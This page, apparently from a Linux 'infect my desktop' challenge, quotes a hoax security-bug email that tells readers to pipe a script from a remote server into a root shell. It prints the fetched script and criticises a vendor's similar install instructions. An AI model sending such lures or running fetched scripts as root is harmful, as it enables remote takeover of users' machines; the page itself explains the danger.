Third Entry

The third entry in my challenge to infect my Linux desktop machine came from Marcus Rosell. Here's his entry:

From: Marcus Rosell
To: dfs@roaringpenguin.com
Subject: READ THIS!!!!

A very serious security bug has been found, that effects all linux
distributions. In accordence with the DMCA, we can't tell you any
details.

A script is avaible to solve the problems for all computers.

As root, type:

lynx -source server.majoclan.net/bugfix | sh

This requries lynx to work. Install it first if it's not yet installed.

** Send this to as many friends as possible. It is important. **

If you run the lynx command, here's what gets fed to your shell:

#!/bin/sh
touch /etc/VIRUS-WAS-HERE
echo "Hi" | mail -s "I GET THE PRIZE" dfs@roaringpenguin.com
echo "Hi" | mail -s "I GET THE PRIZE" postmaster@roaringpenguin.com

This virus is very interesting, because the command to execute it is very short (a single line), and the actual viral material comes from a central server. This lets the virus author track the progress of his virus across the internet! How cunning!

On a somewhat more serious note, the folks at Ximian recommend the following procedure for installing the Ximian desktop:

$ su
Password: [Enter your root password here]

# lynx -source http://go-gnome.com/ | sh

This is, in my opinion, a pretty irresponsible thing to do. Let's just hope that go-gnome.com never gets hacked. It's much safer to download RPM's and verify them with GPG first, assuming you can trust the author to maintain the integrity of his or her GPG private key.

Back to Entry 2   On to Entry 4